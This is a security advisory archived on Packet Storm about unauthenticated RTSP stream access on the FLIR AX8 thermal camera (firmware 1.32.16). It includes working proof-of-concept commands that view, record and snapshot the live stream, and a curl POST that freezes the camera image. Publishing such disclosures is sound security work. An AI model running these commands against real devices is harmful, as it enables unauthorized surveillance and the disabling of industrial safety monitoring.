exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

FLIR Systems FLIR AX8 Thermal Camera 1.32.16 RTSP Stream Disclosure

FLIR Systems FLIR AX8 Thermal Camera 1.32.16 RTSP Stream Disclosure
Posted Oct 15, 2018
Authored by LiquidWorm | Site zeroscience.mk

The FLIR AX8 thermal sensor camera version 1.32.16 suffers an unauthenticated and unauthorized live RTSP video stream access.

tags | exploit
SHA-256 | ae1464855d3b12a1fe0dc5269d50e29d905cd74a8815b4317e3f235a057d14ce

FLIR Systems FLIR AX8 Thermal Camera 1.32.16 RTSP Stream Disclosure

Change Mirror Download

FLIR Systems FLIR AX8 Thermal Camera 1.32.16 RTSP Stream Disclosure


Vendor: FLIR Systems, Inc.
Product web page: https://www.flir.com
Affected version: Firmware: 1.32.16
1.17.13
OS: neco_v1.8-0-g7ffe5b3
Hardware: Flir Systems Neco Board

Summary: Thermal Imaging Camera For Continuous Condition and Safety
Monitoring FLIR AX8 is a thermal sensor with imaging capabilities.
Combining thermal and visual cameras in a small, affordable package,
the AX8 provides continuous temperature monitoring and alarming capabilities
to protec critical electrical and mechanical equipment. The AX8 helps
you guard against unplanned outages, service interruptions, and equipment
failure.

The FLIR AX series camera/sensor also has built-in support to connect to
industrial control equipment such as programmable logic controllers (PLCs),
and allows the sharing of analysis and alarm results and simple control
using the Ethernet/IP and Modbus TCP field bus protocols. Compact and easy
to install, the AX8 provides continuous monitoring of electrical cabinets,
process and manufacturing areas, data centers, energy generation and distribution,
transportation and mass transit, storage facilities and refrigeration warehouses.

Desc: The FLIR AX8 thermal sensor camera suffers an unauthenticated and unauthorized
live RTSP video stream access.

Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l)
lighttpd/1.4.33
PHP/5.4.14


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2018-5492
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5492.php


26.07.2018

--


To access the stream:
---------------------

$ cvlc rtsp://192.168.1.34/mpeg4 --fullscreen
$ ffmpeg -i rtsp://192.168.1.34/mpeg4 -b 7000k -vcodec copy -r 60 -y ./meltdown.mp4
$ ffplay rtsp://192.168.1.34/mpeg4
$ wget http://192.168.1.34/snapshot.jpg ; eog snapshot.jpg


To freeze the stream:
---------------------

$ curl -d "action=set&resource=.image.state.freeze.set&value=true" -X POST http://192.168.1.34/res.php
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close